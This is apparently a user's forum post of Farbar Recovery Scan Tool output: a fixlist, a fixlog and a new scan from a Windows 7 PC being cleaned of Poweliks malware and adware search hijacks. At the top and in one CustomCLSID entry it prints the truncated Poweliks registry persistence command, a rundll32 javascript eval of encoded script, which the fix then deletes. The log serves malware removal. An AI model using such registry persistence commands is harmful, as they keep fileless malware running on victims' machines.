HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
SearchScopes: HKLM - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKLM - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
SearchScopes: HKCU - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
BHO: No Name -> {9030D464-4C02-4ABF-8ECC-5164760863C6} ->  No File
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled No File
S3 SophosVirusRemovalTool; C:\Program Files\Sophos\Sophos Virus Removal Tool\SVRTservice.exe [X]
S3 MFE_RR; \??\C:\Users\Jude\AppData\Local\Temp\mfe_rr.sys [X]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
C:\Users\Jude\Documents\SpyHunter-Installer.exe
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
C:\Users\Jude\AppData\Local\{D76B0B32-AE89-4965-A220-20340E32DB46}
C:\Users\Jude\AppData\Local\{1E67DC0C-F6E5-45C4-8408-EB5E04C72A6E}
C:\ProgramData\flashax10.exe
C:\Users\Jude\gotomypc_540.exe
C:\Users\Jude\AppData\Local\Temp\catchme.dll
C:\Users\Jude\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Jude\AppData\Local\Temp\ezGameXN.dll
C:\Users\Jude\AppData\Local\Temp\GameXNGO.exe
C:\Users\Jude\AppData\Local\Temp\MSN407.exe
C:\Users\Jude\AppData\Local\Temp\nss6D16.tmp.exe
C:\Users\Jude\AppData\Local\Temp\Quarantine.exe
C:\Users\Jude\AppData\Local\Temp\Refresh.exe
C:\Users\Jude\AppData\Local\Temp\SHSetup.exe
C:\Users\Jude\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Jude\AppData\Local\Temp\sqlite3.dll
C:\Users\Jude\AppData\Local\Temp\sqlite3.exe
C:\Users\Jude\AppData\Local\Temp\vxocslb.dll
C:\Users\Jude\AppData\Local\Temp\_is7D79.exe
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{56CBD3CF-BF99-4DF5-851F-F5B9B57496A1}\InprocServer32 -> C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\twain_32.dll (Microsoft)
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}\InprocServer32 -> C:\Program Files\Skype\Plugin Manager\ezPMUtils.dll No File
S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys
C:\windows\system32\drivers\hitmanpro37.sys
C:\ProgramData\Sophos
C:\ProgramData\HitmanPro
AlternateDataStreams: C:\Users\Jude\Documents\Grandpa Frank's picture.eml:OECustomProperty
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SophosVirusRemovalTool => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SophosVirusRemovalTool => ""="Service"
*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKU\S-1-5-21-4075801609-534856644-2620926182-1004\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key not found.
"HKU\S-1-5-21-4075801609-534856644-2620926182-1004\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
HKCU\Software\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b0441a0e-a49a-4e16-afc1-74ecced1921f}" => Key deleted successfully.
"HKCR\CLSID\{b0441a0e-a49a-4e16-afc1-74ecced1921f}" => Key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{cca2e567-1987-4100-a3c6-5b4267084510}" => Key deleted successfully.
"HKCR\CLSID\{cca2e567-1987-4100-a3c6-5b4267084510}" => Key not found.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b0441a0e-a49a-4e16-afc1-74ecced1921f}" => Key deleted successfully.
"HKCR\CLSID\{b0441a0e-a49a-4e16-afc1-74ecced1921f}" => Key not found.
"HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{cca2e567-1987-4100-a3c6-5b4267084510}" => Key deleted successfully.
"HKCR\CLSID\{cca2e567-1987-4100-a3c6-5b4267084510}" => Key not found.
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}" => Key deleted successfully.
"HKCR\CLSID\{9030D464-4C02-4ABF-8ECC-5164760863C6}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => value deleted successfully.
"HKCR\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068}" => Key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
SophosVirusRemovalTool => Service deleted successfully.
MFE_RR => Service deleted successfully.
RtsUIR => Service deleted successfully.
USBCCID => Service deleted successfully.
C:\Users\Jude\Documents\SpyHunter-Installer.exe => Moved successfully.

"C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}" directory move:

Could not move "C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\333c1a3f07c8a" => Scheduled to move on reboot.
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\ayookmyii.tmp => Moved successfully.
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\imaeaoyme.tmp => Moved successfully.
Could not move "C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\mcquwuiuk.tmp" => Scheduled to move on reboot.
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\muiyymeesy.tmp => Moved successfully.
Could not move "C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\twain_32.dll" => Scheduled to move on reboot.
Could not move "C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}" directory. => Scheduled to move on reboot.

C:\Users\Jude\AppData\Local\{D76B0B32-AE89-4965-A220-20340E32DB46} => Moved successfully.
C:\Users\Jude\AppData\Local\{1E67DC0C-F6E5-45C4-8408-EB5E04C72A6E} => Moved successfully.
C:\ProgramData\flashax10.exe => Moved successfully.
C:\Users\Jude\gotomypc_540.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\catchme.dll => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\dllnt_dump.dll => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\ezGameXN.dll => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\GameXNGO.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\MSN407.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\nss6D16.tmp.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\Quarantine.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\Refresh.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\SHSetup.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\SkypeSetup.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\sqlite3.dll => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\sqlite3.exe => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\vxocslb.dll => Moved successfully.
C:\Users\Jude\AppData\Local\Temp\_is7D79.exe => Moved successfully.
"HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{56CBD3CF-BF99-4DF5-851F-F5B9B57496A1}" => Key deleted successfully.
"HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
"HKU\S-1-5-21-4075801609-534856644-2620926182-1004_Classes\CLSID\{D0D38C6E-BF64-4C42-840D-3E0019D9F7A6}" => Key deleted successfully.
hitmanpro37 => Service deleted successfully.
C:\windows\system32\drivers\hitmanpro37.sys => Moved successfully.
C:\ProgramData\Sophos => Moved successfully.
C:\ProgramData\HitmanPro => Moved successfully.
C:\Users\Jude\Documents\Grandpa Frank's picture.eml => ":OECustomProperty" ADS removed successfully.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SophosVirusRemovalTool" => Key deleted successfully.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SophosVirusRemovalTool" => Key deleted successfully.

=> Result of Scheduled Files to move (Boot Mode: Normal) (Date&Time: 2014-10-28 17:39:55)<=

C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\333c1a3f07c8a => Is moved successfully.
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\mcquwuiuk.tmp => Is moved successfully.
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\twain_32.dll => Is moved successfully.
C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4} => Is moved successfully.

==== End of Fixlog ====

 

Here are the results of the FRST scan:

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 26-10-2014
Ran by Jude (administrator) on GERSTNER-PC on 28-10-2014 17:42:56
Running from C:\Users\Jude\Documents
Loaded Profile: Jude (Available profiles: Jude)
Platform: Microsoft Windows 7 Home Premium  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\DIBS\DDNIService.exe
(SEIKO EPSON CORPORATION) C:\Program Files\epson\EpsonCustomerParticipation\EPCP.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2svc.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2comm.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2pre.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2tray.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2mainh.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2host.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2audioh.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2printh.exe
(Lenovo (Shenzhen) Electronic Co., Ltd.) C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Lenovo) C:\Program Files\Lenovo\HealthCare\HealthCare.exe
(CyberLink) C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Epson Software\Event Manager\EEventManager.exe
(SEIKO EPSON CORPORATION) C:\Windows\System32\spool\drivers\w32x86\3\E_FATIHQA.EXE
(Skype Technologies S.A.) C:\Program Files\Skype\Phone\Skype.exe
(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McUICnt.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SCServer\SCServer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [LenovoFSC] => C:\Program Files\Lenovo\FanSpeedControl\LenovoFSC.exe [49152 2009-07-29] (Lenovo (Shenzhen) Electronic Co., Ltd.)
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2009-07-10] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7830048 2009-10-13] (Realtek Semiconductor)
HKLM\...\Run: [Healthcare] => C:\Program Files\Lenovo\HealthCare\HealthCare.exe [827392 2009-09-28] (Lenovo)
HKLM\...\Run: [CLMLServer] => C:\Program Files\Lenovo\Power2Go\CLMLSvc.exe [103720 2009-06-03] (CyberLink)
HKLM\...\Run: [UpdateP2GoShortCut] => C:\Program Files\Lenovo\Power2Go\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM\...\Run: [IdeaNotesUser] => C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGUser.exe [221872 2009-08-24] (Digital Delivery Networks, Inc.)
HKLM\...\Run: [EEventManager] => C:\Program Files\Epson Software\Event Manager\EEventManager.exe [979328 2010-10-12] (SEIKO EPSON CORPORATION)
HKLM\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
HKLM\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-09-12] (Adobe Systems Incorporated)
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...\Run: [EPSON Artisan 730 Series] => C:\windows\system32\spool\DRIVERS\W32X86\3\E_FATIHQA.EXE [212480 2011-01-20] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...\Run: [Skype] => C:\Program Files\Skype\Phone\Skype.exe [21444224 2014-05-08] (Skype Technologies S.A.)
HKU\S-1-5-18\...\RunOnce: [WLStart] => C:\Program Files\Windows Live\Installer\wlstart.exe [768336 2009-07-26] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x776496073BEDCF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
URLSearchHook: HKCU - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
SearchScopes: HKCU - {4FA18F2D-C961-4586-BD6C-A753A39CF7C1} URL = http://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://vpn.harris.com/dana-cached/sc/JuniperSetupClient.cab
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll (McAfee, Inc.)
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF Plugin: @mcafee.com/SAFFPlugin -> C:\Program Files\McAfee\SiteAdvisor\npmcffplg32.dll (McAfee, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.1.10329.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\SiteAdvisor
FF Extension: McAfee SiteAdvisor - C:\Program Files\McAfee\SiteAdvisor [2011-07-30]
FF HKLM\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2012-08-25]

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files\McAfee\SiteAdvisor\McChPlg.crx [2013-06-25]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 DDNIMSGService; C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe [171872 2010-07-20] (Digital Delivery Networks, Inc.) [File not signed]
R2 DDNIService; C:\Program Files\DDNI\DIBS\DDNIService.exe [163680 2010-07-23] (Digital Delivery Networks, Inc.) [File not signed]
R2 EpsonCustomerParticipation; C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe [521600 2011-06-09] (SEIKO EPSON CORPORATION)
R2 GoToMyPC; C:\Program Files\Citrix\GoToMyPC\g2svc.exe [1335640 2014-09-04] (Citrix Online, a division of Citrix Systems, Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [145568 2014-04-25] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [472072 2014-06-12] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [655936 2014-07-24] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [169800 2014-06-20] (McAfee, Inc.)
R2 mfevtp; C:\windows\system32\mfevtps.exe [179600 2014-06-20] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [44384 2010-12-10] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 cfwids; C:\windows\System32\drivers\cfwids.sys [62832 2014-06-20] (McAfee, Inc.)
S3 HipShieldK; C:\windows\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [23256 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-28] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [51928 2014-10-01] (Malwarebytes Corporation)
R3 mfeapfk; C:\windows\System32\drivers\mfeapfk.sys [135968 2014-06-20] (McAfee, Inc.)
R3 mfeavfk; C:\windows\System32\drivers\mfeavfk.sys [238176 2014-06-20] (McAfee, Inc.)
S3 mfebopk; C:\windows\System32\drivers\mfebopk.sys [67816 2014-06-20] (McAfee, Inc.)
R3 mfefirek; C:\windows\System32\drivers\mfefirek.sys [369248 2014-06-20] (McAfee, Inc.)
R0 mfehidk; C:\windows\System32\drivers\mfehidk.sys [576048 2014-06-20] (McAfee, Inc.)
R3 mfencbdc; C:\windows\System32\DRIVERS\mfencbdc.sys [349192 2014-07-24] (McAfee, Inc.)
S3 mfencrk; C:\windows\System32\DRIVERS\mfencrk.sys [81296 2014-07-24] (McAfee, Inc.)
R0 mfewfpk; C:\windows\System32\drivers\mfewfpk.sys [217224 2014-06-20] (McAfee, Inc.)
R2 monblanking; C:\windows\System32\DRIVERS\monblanking.sys [29280 2014-09-04] (Citrix Systems, Inc.)
R3 SuperIO; C:\windows\System32\DRIVERS\spio.sys [11720 2009-06-05] ()
R2 WinI2C-DDC; C:\windows\system32\drivers\DDCDrv.sys [16200 2009-03-02] (Nicomsoft Ltd.)
S3 wsvd; C:\windows\System32\DRIVERS\wsvd.sys [81704 2009-07-21] (CyberLink)
U5 AppMgmt; C:\windows\system32\svchost.exe [20992 2009-07-13] (Microsoft Corporation)
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-28 17:31 - 2014-10-28 17:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2014-10-27 05:34 - 2014-10-27 05:34 - 00143944 _____ () C:\windows\Minidump\102714-22557-01.dmp
2014-10-26 21:58 - 2014-10-26 21:58 - 00027025 _____ () C:\Users\Jude\Documents\Addition.txt
2014-10-26 21:56 - 2014-10-28 17:42 - 00015014 _____ () C:\Users\Jude\Documents\FRST.txt
2014-10-26 21:56 - 2014-10-26 21:56 - 00000000 ____D () C:\Users\Jude\Documents\FRST-OlderVersion
2014-10-26 17:12 - 2014-10-26 17:12 - 00143944 _____ () C:\windows\Minidump\102614-13400-01.dmp
2014-10-24 20:38 - 2014-10-24 20:38 - 16281688 _____ () C:\Users\Jude\Downloads\RogueKiller.exe
2014-10-24 19:30 - 2014-10-28 17:43 - 00000000 ____D () C:\FRST
2014-10-24 19:19 - 2014-10-26 21:56 - 01104896 _____ (Farbar) C:\Users\Jude\Documents\FRST.exe
2014-10-24 19:14 - 2014-10-24 19:14 - 00000197 _____ () C:\windows\system32\2014-10-25-00-14-23.060-AvastVBoxSVC.exe-6096.log
2014-10-23 22:23 - 2014-10-23 22:23 - 00000247 _____ () C:\windows\system32\2014-10-24-03-23-19.088-aswFe.exe-2368.log
2014-10-23 22:15 - 2014-10-23 22:15 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-10-23 22:14 - 2014-10-24 19:39 - 00000000 ____D () C:\windows\455F074C814E4520B69B5584BD90400C.TMP
2014-10-23 22:14 - 2014-10-23 22:14 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-10-23 21:06 - 2014-10-23 21:06 - 00000197 _____ () C:\windows\system32\2014-10-24-02-06-00.040-AvastVBoxSVC.exe-9492.log
2014-10-23 20:57 - 2014-10-23 21:01 - 00000000 ____D () C:\AdwCleaner
